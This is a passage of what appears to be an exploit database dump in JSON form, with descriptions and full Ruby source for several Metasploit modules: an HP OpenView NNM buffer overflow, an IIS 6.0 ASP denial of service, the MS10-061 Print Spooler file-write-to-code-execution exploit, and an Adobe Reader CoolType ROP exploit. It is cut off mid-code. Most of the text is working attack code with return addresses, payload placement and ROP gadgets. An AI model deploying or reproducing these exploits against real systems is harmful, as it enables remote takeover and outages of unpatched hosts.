Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated.\n", "modified": "2017-09-14T02:03:34", "published": "2011-03-23T03:23:06", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_WEBAPPMON_EXECVP", "href": "", "type": "metasploit", "title": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n #include Msf::Exploit::Remote::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager execvp_nc Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.\n } ,\n 'Author' =>\n [\n 'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB #6 PoC and binary analysis\n 'sinn3r',\n 'jduck' # Metasploit module\n ],\n 'License'\t => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-2703' ],\n [ 'OSVDB', '66514' ],\n [ 'BID', '41829' ],\n [ 'ZDI', '10-137' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088' ]\n ],\n 'Payload'\t =>\n {\n 'Space' => 1024, # 16384 buffer..\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x24\\x2c\\x3b\\x60\",\n 'DisableNops' => true,\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets'\t =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01206',\n {\n 'Ret' => 0x5a02aacf, # pop edx/pop ebp/ret - in ov.dll (v1.30.12.29)\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DisclosureDate' => 'Jul 20 2010'))\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/webappmon.exe'\n\n #\n # [ char CommandLine[16384] ][ char Parameters[16384] ]\n #\n # The first buffer gets smashed into the second, and a strcat is used on the second as well.\n # Therefore, we get an addative overflow.\n #\n\n # Parameters before strcat\n param_beg = \"std \\\\\\\\.\\\\pipe\\\\OVSystem\\\\stdout\\\\0000038c00000001 \\\\\\\\.\\\\pipe\\\\OVSystem\\\\stderr\\\\0000038c00000001 \"\n\n # CommnadLine before / after strcat\n cmd_beg = \"OVcmd \"\n cmd_beg << param_beg\n cmd_beg << \"ping.exe -n 3 \\\"\"\n cmd_end = \"\\\" \"\n\n # Other actions include: rping demandPoll natping locateRoute\n # And more...\n action = 'ping'\n\n # The buffer size is 16384, but we need to send enough extra so that we can still\n # overwrite the saved return address etc..\n bufsz = 16384 + param_beg.length\n\n # These addresses are within ov.dll\n ptr_to_zero = 0x5a066fff\n ptr_to_nonzero = 0x5a06706f\n ptr_to_ppr = target.ret\n ptr_to_ret = target.ret + 2\n\n payload_off = 578 # re-used pointer on the stack\n fixret_off = 16394\n fixret = [\n ptr_to_ppr,\n # stay alive til ret\n ptr_to_zero,\n ptr_to_nonzero\n ]\n # ret slide down to within 2 pops :)\n ((0x40 / 4) - 3).times {\n fixret << ptr_to_ret\n }\n # use the ppr to jump the last two, and go to the ptr\n fixret << ptr_to_ppr\n fixret = fixret.pack('V*')\n\n buf = ''\n buf << rand_text(bufsz - cmd_end.length)\n\n buf[fixret_off, fixret.length] = fixret\n\n # Put the payload in.\n buf[payload_off, payload.encoded.length] = payload.encoded\n\n # Slice off the start (so pattern_offset returns offset from beginning\n buf.slice!(0, cmd_beg.length)\n\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'ins' => 'nowait',\n 'sel' => buf,\n 'act' => action\n }\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb"}, {"lastseen": "2019-11-29T09:39:23", "bulletinFamily": "exploit", "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a Post Form value.\n", "modified": "2017-07-24T13:26:21", "published": "2010-11-24T20:10:01", "id": "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS", "href": "", "type": "metasploit", "title": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',\n 'Description' => %q{\n The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.\n },\n 'Author' =>\n [\n 'Heyder Andrade <heyder[at]alligatorteam.org>',\n 'Leandro Oliveira <leadro[at]alligatorteam.org>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1899' ],\n [ 'OSVDB', '67978'],\n [ 'MSB', 'MS10-065'],\n [ 'EDB', '15167' ]\n ],\n 'DisclosureDate' => 'Sep 14 2010'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),\n OptString.new('URI', [ true, 'URI to request', '/page.asp' ])\n ])\n end\n\n\n def run\n uri = datastore['URI']\n print_status(\"Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}\")\n\n begin\n while(1)\n begin\n connect\n payload = \"C=A&\" * 40000\n length = payload.size\n sploit = \"HEAD #{uri} HTTP/1.1\\r\\n\"\n sploit << \"Host: #{datastore['VHOST'] || rhost}\\r\\n\"\n sploit << \"Connection:Close\\r\\n\"\n sploit << \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n sploit << \"Content-Length:#{length} \\r\\n\\r\\n\"\n sploit << payload\n sock.put(sploit)\n #print_status(\"DoS packet sent.\")\n disconnect\n rescue Errno::ECONNRESET\n next\n end\n end\n rescue Errno::EPIPE\n print_good(\"IIS should now be unavailable\")\n end\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb"}, {"lastseen": "2019-11-26T13:45:40", "bulletinFamily": "exploit", "description": "This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-18T17:56:22", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS10_061_SPOOLSS", "href": "", "type": "metasploit", "title": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability',\n 'Description' => %q{\n This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.\n },\n 'Author' =>\n [\n 'jduck', # re-discovery, printer RPC stubs, module\n 'hdm' # ATSVC RPC proxy method, etc ;)\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'References' =>\n [\n [ 'OSVDB', '67988' ],\n [ 'CVE', '2010-2729' ],\n [ 'MSB', 'MS10-061' ]\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\",\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Windows Universal', { } ]\n ],\n 'DisclosureDate' => 'Sep 14 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ false, \"The named pipe for the spooler service\", \"spoolss\"]),\n OptString.new('PNAME', [ false, \"The printer share name to use on the target\" ]),\n ])\n end\n\n\n def exploit\n\n connect()\n login_time = Time.now\n smb_login()\n\n print_status(\"Trying target #{target.name}...\")\n\n handle = dcerpc_handle('12345678-1234-abcd-EF00-0123456789ab', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\n\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n\n print_status(\"Bound to #{handle} ...\")\n\n # Try all of the printers :)\n printers = []\n if (pname = datastore['PNAME'])\n printers << pname\n else\n res = self.simple.client.trans(\n \"\\\\PIPE\\\\LANMAN\",\n (\n [0x00].pack('v') +\n \"WrLeh\\x00\" +\n \"B13BWz\\x00\" +\n [0x01, 65406].pack(\"vv\")\n )\n )\n\n printers = []\n\n lerror, lconv, lentries, lcount = res['Payload'].to_s[\n res['Payload'].v['ParamOffset'],\n res['Payload'].v['ParamCount']\n ].unpack(\"v4\")\n\n data = res['Payload'].to_s[\n res['Payload'].v['DataOffset'],\n res['Payload'].v['DataCount']\n ]\n\n 0.upto(lentries - 1) do |i|\n sname,tmp = data[(i * 20) + 0, 14].split(\"\\x00\")\n stype = data[(i * 20) + 14, 2].unpack('v')[0]\n scoff = data[(i * 20) + 16, 2].unpack('v')[0]\n if ( lconv != 0)\n scoff -= lconv\n end\n scomm,tmp = data[scoff, data.length - scoff].split(\"\\x00\")\n\n # we only want printers\n next if stype != 1\n\n printers << sname\n end\n end\n\n # Generate a payload EXE to execute\n exe = generate_payload_exe\n\n printers.each { |pr|\n\n pname = \"\\\\\\\\#{rhost}\\\\#{pr}\"\n\n print_status(\"Attempting to exploit MS10-061 via #{pname} ...\")\n\n # Open the printer\n status,ph = open_printer_ex(pname)\n if status != 0\n fail_with(Failure::Unknown, \"Unable to open printer: #{Msf::WindowsError.description(status)}\")\n end\n print_status(\"Printer handle: %s\" % ph.unpack('H*'))\n\n\n # NOTE: fname can be anything nice to write to (cwd is system32), even\n # directory traversal and full paths are OK.\n fname = rand_text_alphanumeric(14) + \".exe\"\n write_file_contents(ph, fname, exe)\n\n # Generate a MOF file and write it so that the Windows Management Service will\n # execute our binary ;)\n mofname = rand_text_alphanumeric(14) + \".mof\"\n mof = generate_mof(mofname, fname)\n write_file_contents(ph, \"wbem\\\\mof\\\\#{mofname}\", mof)\n\n # ClosePrinter\n status,ph = close_printer(ph)\n if status != 0\n fail_with(Failure::Unknown, \"Failed to close printer: #{Msf::WindowsError.description(status)}\")\n end\n\n break if session_created?\n }\n\n print_status(\"Everything should be set, waiting for a session...\")\n handler\n\n cnt = 1\n while session_created? == false and cnt < 25\n ::IO.select(nil, nil, nil, 0.25)\n cnt += 1\n end\n\n disconnect\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError\n fail_with(Failure::Unknown, $!.message)\n end\n\n\n #\n # Use the vuln to write a file :)\n #\n def write_file_contents(ph, fname, data)\n\n doc = rand_text_alphanumeric(16+rand(16))\n\n # StartDocPrinter\n status,jobid = start_doc_printer(ph, doc, fname)\n if status != 0 or jobid < 0\n fail_with(Failure::Unknown, \"Unable to start print job: #{Msf::WindowsError.description(status)}\")\n end\n print_status(\"Job started: 0x%x\" % jobid)\n\n # WritePrinter\n status,wrote = write_printer(ph, data)\n if status != 0 or wrote != data.length\n fail_with(Failure::Unknown, ('Failed to write %d bytes!' % data.length))\n end\n print_status(\"Wrote %d bytes to %%SystemRoot%%\\\\system32\\\\%s\" % [data.length, fname])\n\n # EndDocPrinter\n status = end_doc_printer(ph)\n if status != 0\n fail_with(Failure::Unknown, \"Failed to end print job: #{Msf::WindowsError.description(status)}\")\n end\n end\n\n\n #\n # Call RpcOpenPrinterEx\n #\n def open_printer_ex(pname, machine = nil, user = nil)\n=begin\n DWORD RpcOpenPrinterEx(\n [in, string, unique] STRING_HANDLE pPrinterName,\n [out] PRINTER_HANDLE* pHandle,\n [in, string, unique] wchar_t* pDatatype,\n [in] DEVMODE_CONTAINER* pDevModeContainer,\n [in] DWORD AccessRequired,\n [in] SPLCLIENT_CONTAINER* pClientInfo\n );\n=end\n\n # NOTE: For more information about this encoding, see the following\n # sections of the Open Group's C706 DCE 1.1: RPC\n #\n # 14.3.8 Unions\n # 14.3.10 Pointers\n # 14.3.12.3 Algorithm for Deferral of Referents\n #\n machine ||= ''\n machine = NDR.uwstring(machine)\n user ||= ''\n user = NDR.uwstring(user)\n\n splclient_info =\n NDR.long(0) + # DWORD dwSize;\n machine[0,4] + # [string] wchar_t* pMachineName;\n user[0,4] + # [string] wchar_t* pUserName;\n NDR.long(7600) + # DWORD dwBuildNum\n NDR.long(3) + # DWORD dwMajorVersion;\n NDR.long(0) + # DWORD dwMinorVersion;\n NDR.long(9) # unsigned short wProcessorArchitecture;\n\n # Add the deferred members\n splclient_info << machine[4, machine.length]\n splclient_info << user[4, user.length]\n\n splclient_info[0,4] = NDR.long(splclient_info.length)\n\n splclient_info =\n # union!\n NDR.long(1) + # discriminant (inside copy)\n NDR.long(rand(0xffffffff)) +\n splclient_info\n\n stubdata =\n NDR.uwstring(pname) + # pPrinterName\n NDR.long(0) +\n # DEVMODE_CONTAINER (null)\n NDR.long(0) +\n NDR.long(0) +\n # AccessRequired\n NDR.long(0x02020000) +\n # SPLCLIENT_CONTAINER\n NDR.long(1) + # Level (must be 1)\n # SPLCLIENT_INFO_1\n splclient_info\n\n #print_status('Sending OpenPrinterEx request...')\n response = dcerpc.call(69, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n\n handle = dcerpc.last_response.stub_data[0,20]\n status = dcerpc.last_response.stub_data[20,4].unpack('V').first\n\n return [status, handle]\n end\n\n nil\n end\n\n\n #\n # Call RpcStartDocPrinter\n #\n def start_doc_printer(handle, dname, fname, dtype = nil)\n=begin\n typedef struct _DOC_INFO_CONTAINER {\n DWORD Level;\n [switch_is(Level)] union {\n [case(1)]\n DOC_INFO_1* pDocInfo1;\n } DocInfo;\n } DOC_INFO_CONTAINER;\n DWORD RpcStartDocPrinter(\n [in] PRINTER_HANDLE hPrinter,\n [in] DOC_INFO_CONTAINER* pDocInfoContainer,\n [out] DWORD* pJobId\n );\n=end\n dname = NDR.uwstring(dname)\n if fname\n fname = NDR.uwstring(fname)\n else\n fname = NDR.long(0)\n end\n if dtype\n dtype = NDR.uwstring(dtype)\n else\n dtype = NDR.long(0)\n end\n\n doc_info =\n dname[0, 4] +\n fname[0, 4] +\n dtype[0, 4]\n\n # Add the deferred members\n doc_info << dname[4, dname.length]\n doc_info << fname[4, fname.length]\n doc_info << dtype[4, dtype.length]\n\n doc_info =\n # Union!\n NDR.long(1) +\n NDR.long(rand(0xffffffff)) +\n doc_info\n\n stubdata =\n handle +\n NDR.long(1) +\n doc_info\n\n #print_status('Sending StartDocPrinter request...')\n response = dcerpc.call(17, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n jobid, status = dcerpc.last_response.stub_data.unpack('VV')\n return [status, jobid]\n end\n\n nil\n end\n\n\n #\n # Call RpcWritePrinter\n #\n def write_printer(handle, data)\n=begin\n DWORD RpcWritePrinter(\n [in] PRINTER_HANDLE hPrinter,\n [in, size_is(cbBuf)] BYTE* pBuf,\n [in] DWORD cbBuf,\n [out] DWORD* pcWritten\n );\n=end\n stubdata =\n handle +\n NDR.long(data.length) +\n # Perhaps we need a better data type for BYTE* :)\n data +\n NDR.align(data) +\n NDR.long(data.length)\n\n #print_status('Sending WritePrinter request...')\n response = dcerpc.call(19, stubdata)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n wrote,status = dcerpc.last_response.stub_data.unpack('VV')\n return [status, wrote]\n end\n\n nil\n end\n\n\n #\n # Call RpcEndDocPrinter\n #\n def end_doc_printer(handle)\n=begin\n DWORD RpcEndDocPrinter(\n [in] PRINTER_HANDLE* phPrinter\n );\n=end\n\n #print_status('Sending EndDocPrinter request...')\n response = dcerpc.call(23, handle)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n status = dcerpc.last_response.stub_data[0,4].unpack('V').first\n return status\n end\n\n nil\n end\n\n\n #\n # Call RpcClosePrinter\n #\n def close_printer(handle)\n=begin\n DWORD RpcClosePrinter(\n [in, out] PRINTER_HANDLE* phPrinter\n );\n=end\n\n #print_status('Sending ClosePrinter request...')\n response = dcerpc.call(29, handle)\n if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(dcerpc.last_response.stub_data))\n handle = dcerpc.last_response.stub_data[0,20]\n status = dcerpc.last_response.stub_data[20,4].unpack('V').first\n return [status,handle]\n end\n\n nil\n end\n\n\n def seconds_since_midnight(time)\n # .tv_sec always uses .utc\n (time.tv_sec % 86400)\n\n # This method uses the localtime\n #(time.hour * 3600) + (time.min * 60) + (time.sec)\n end\n\n # We have to wait a bit longer since the WMI service is a bit slow..\n def wfs_delay\n 10\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms10_061_spoolss.rb"}, {"lastseen": "2019-12-06T16:46:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-09T23:23:40", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_COOLTYPE_SING", "href": "", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n @ttf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri(cli, request)\n print_user_agent(cli, request)\n\n print_status(\"Sending crafted PDF\")\n\n ttf_data = make_ttf()\n\n js_data = make_js(regenerate_payload(cli).encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n def print_user_agent(cli, req)\n return unless cli && cli.peerhost\n return unless req && req.headers\n return unless ua = req.headers[\"User-Agent\"]\n print_status \"Request from browser: #{ua}\"\n end\n\n def make_ttf\n\n # load the static ttf file\n ttf_data = @ttf_data.dup\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # 